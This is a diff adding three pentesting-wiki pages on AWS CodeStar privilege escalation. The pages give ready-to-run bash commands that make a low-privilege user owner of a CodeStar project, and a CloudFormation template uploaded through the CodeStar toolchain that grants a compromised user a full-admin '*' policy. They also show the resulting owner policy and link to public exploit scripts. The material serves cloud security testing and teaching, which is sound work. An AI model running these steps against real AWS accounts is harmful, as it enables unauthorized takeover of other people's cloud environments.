Migrate to using mdbook

src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md

@@ -0,0 +1,73 @@
+# AWS - Codestar Privesc
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+## Codestar
+
+You can find more information about codestar in:
+
+{{#ref}}
+codestar-createproject-codestar-associateteammember.md
+{{#endref}}
+
+### `iam:PassRole`, `codestar:CreateProject`
+
+With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**. Check the following page:
+
+{{#ref}}
+iam-passrole-codestar-createproject.md
+{{#endref}}
+
+### `codestar:CreateProject`, `codestar:AssociateTeamMember`
+
+This technique uses `codestar:CreateProject` to create a codestar project, and `codestar:AssociateTeamMember` to make an IAM user the **owner** of a new CodeStar **project**, which will grant them a **new policy with a few extra permissions**.
+
+```bash
+PROJECT_NAME="supercodestar"
+
+aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \
+    --name $PROJECT_NAME \
+    --id $PROJECT_NAME
+
+echo "Waiting 1min to start the project"
+sleep 60
+
+USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile | jq .UserProfile.IamUserArn | tr -d '"')
+
+aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \
+    --project-id $PROJECT_NAME \
+    --user-arn "$USER_ARN" \
+    --project-role "Owner" \
+    --remote-access-allowed
+```
+
+If you are already a **member of the project** you can use the permission **`codestar:UpdateTeamMember`** to **update your role** to owner instead of `codestar:AssociateTeamMember`
+
+**Potential Impact:** Privesc to the codestar policy generated. You can find an example of that policy in:
+
+{{#ref}}
+codestar-createproject-codestar-associateteammember.md
+{{#endref}}
+
+### `codestar:CreateProjectFromTemplate`
+
+1. **Create a New Project:**
+   - Utilize the **`codestar:CreateProjectFromTemplate`** action to initiate the creation of a new project.
+     - Upon successful creation, access is automatically granted for **`cloudformation:UpdateStack`**.
+     - This access specifically targets a stack associated with the `CodeStarWorker-<generic project name>-CloudFormation` IAM role.
+2. **Update the Target Stack:**
+   - With the granted CloudFormation permissions, proceed to update the specified stack.
+     - The stack's name will typically conform to one of two patterns:
+       - `awscodestar-<generic project name>-infrastructure`
+       - `awscodestar-<generic project name>-lambda`
+       - The exact name depends on the chosen template (referencing the example exploit script).
+3. **Access and Permissions:**
+   - Post-update, you obtain the capabilities assigned to the **CloudFormation IAM role** linked with the stack.
+   - Note: This does not inherently provide full administrator privileges. Additional misconfigured resources within the environment might be required to elevate privileges further.
+
+For more information check the original research: [https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/](https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/).\
+You can find the exploit in [https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py)
+
+**Potential Impact:** Privesc to cloudformation IAM role.
+
+{{#include ../../../../banners/hacktricks-training.md}}

src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md

@@ -0,0 +1,81 @@
+# codestar:CreateProject, codestar:AssociateTeamMember
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+This is the created policy the user can privesc to (the project name was `supercodestar`):
+
+```json
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Sid": "1",
+      "Effect": "Allow",
+      "Action": ["codestar:*", "iam:GetPolicy*", "iam:ListPolicyVersions"],
+      "Resource": [
+        "arn:aws:codestar:eu-west-1:947247140022:project/supercodestar",
+        "arn:aws:events:eu-west-1:947247140022:rule/awscodestar-supercodestar-SourceEvent",
+        "arn:aws:iam::947247140022:policy/CodeStar_supercodestar_Owner"
+      ]
+    },
+    {
+      "Sid": "2",
+      "Effect": "Allow",
+      "Action": [
+        "codestar:DescribeUserProfile",
+        "codestar:ListProjects",
+        "codestar:ListUserProfiles",
+        "codestar:VerifyServiceRole",
+        "cloud9:DescribeEnvironment*",
+        "cloud9:ValidateEnvironmentName",
+        "cloudwatch:DescribeAlarms",
+        "cloudwatch:GetMetricStatistics",
+        "cloudwatch:ListMetrics",
+        "codedeploy:BatchGet*",
+        "codedeploy:List*",
+        "codestar-connections:UseConnection",
+        "ec2:DescribeInstanceTypeOfferings",
+        "ec2:DescribeInternetGateways",
+        "ec2:DescribeNatGateways",
+        "ec2:DescribeRouteTables",
+        "ec2:DescribeSecurityGroups",
+        "ec2:DescribeSubnets",
+        "ec2:DescribeVpcs",
+        "events:ListRuleNamesByTarget",
+        "iam:GetAccountSummary",
+        "iam:GetUser",
+        "iam:ListAccountAliases",
+        "iam:ListRoles",
+        "iam:ListUsers",
+        "lambda:List*",
+        "sns:List*"
+      ],
+      "Resource": ["*"]
+    },
+    {
+      "Sid": "3",
+      "Effect": "Allow",
+      "Action": [
+        "codestar:*UserProfile",
+        "iam:GenerateCredentialReport",
+        "iam:GenerateServiceLastAccessedDetails",
+        "iam:CreateAccessKey",
+        "iam:UpdateAccessKey",
+        "iam:DeleteAccessKey",
+        "iam:UpdateSSHPublicKey",
+        "iam:UploadSSHPublicKey",
+        "iam:DeleteSSHPublicKey",
+        "iam:CreateServiceSpecificCredential",
+        "iam:UpdateServiceSpecificCredential",
+        "iam:DeleteServiceSpecificCredential",
+        "iam:ResetServiceSpecificCredential",
+        "iam:Get*",
+        "iam:List*"
+      ],
+      "Resource": ["arn:aws:iam::947247140022:user/${aws:username}"]
+    }
+  ]
+}
+```
+
+{{#include ../../../../banners/hacktricks-training.md}}

src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md

@@ -0,0 +1,88 @@
+# iam:PassRole, codestar:CreateProject
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**.
+
+To exploit this you need to create a **S3 bucket that is accessible** from the attacked account. Upload a file called `toolchain.json` . This file should contain the **cloudformation template exploit**. The following one can be used to set a managed policy to a user under your control and **give it admin permissions**:
+
+```json:toolchain.json
+{
+  "Resources": {
+    "supercodestar": {
+      "Type": "AWS::IAM::ManagedPolicy",
+      "Properties": {
+        "ManagedPolicyName": "CodeStar_supercodestar",
+        "PolicyDocument": {
+          "Version": "2012-10-17",
+          "Statement": [
+            {
+              "Effect": "Allow",
+              "Action": "*",
+              "Resource": "*"
+            }
+          ]
+        },
+        "Users": ["<compromised username>"]
+      }
+    }
+  }
+}
+```
+
+Also **upload** this `empty zip` file to the **bucket**:
+
+{% file src="../../../../images/empty.zip" %}
+
+Remember that the **bucket with both files must be accessible by the victim account**.
+
+With both things uploaded you can now proceed to the **exploitation** creating a **codestar** project:
+
+```bash
+PROJECT_NAME="supercodestar"
+
+# Crecte the source JSON
+## In this JSON the bucket and key (path) to the empry.zip file is used
+SOURCE_CODE_PATH="/tmp/surce_code.json"
+SOURCE_CODE="[
+    {
+        \"source\": {
+            \"s3\": {
+                \"bucketName\": \"privesc\",
+                \"bucketKey\": \"empty.zip\"
+            }
+    },
+        \"destination\": {
+            \"codeCommit\": {
+                \"name\": \"$PROJECT_NAME\"
+            }
+        }
+    }
+]"
+printf "$SOURCE_CODE" > $SOURCE_CODE_PATH
+
+# Create the toolchain JSON
+## In this JSON the bucket and key (path) to the toolchain.json file is used
+TOOLCHAIN_PATH="/tmp/tool_chain.json"
+TOOLCHAIN="{
+    \"source\": {
+        \"s3\": {
+            \"bucketName\": \"privesc\",
+            \"bucketKey\": \"toolchain.json\"
+        }
+    },
+    \"roleArn\": \"arn:aws:iam::947247140022:role/service-role/aws-codestar-service-role\"
+}"
+printf "$TOOLCHAIN" > $TOOLCHAIN_PATH
+
+# Create the codestar project that will use the cloudformation epxloit to privesc
+aws codestar create-project \
+    --name $PROJECT_NAME \
+    --id $PROJECT_NAME \
+    --source-code file://$SOURCE_CODE_PATH \
+    --toolchain file://$TOOLCHAIN_PATH
+```
+
+This exploit is based on the **Pacu exploit of these privileges**: [https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam\_\_privesc_scan/main.py#L1997](https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1997) On it you can find a variation to create an admin managed policy for a role instead of to a user.
+
+{{#include ../../../../banners/hacktricks-training.md}}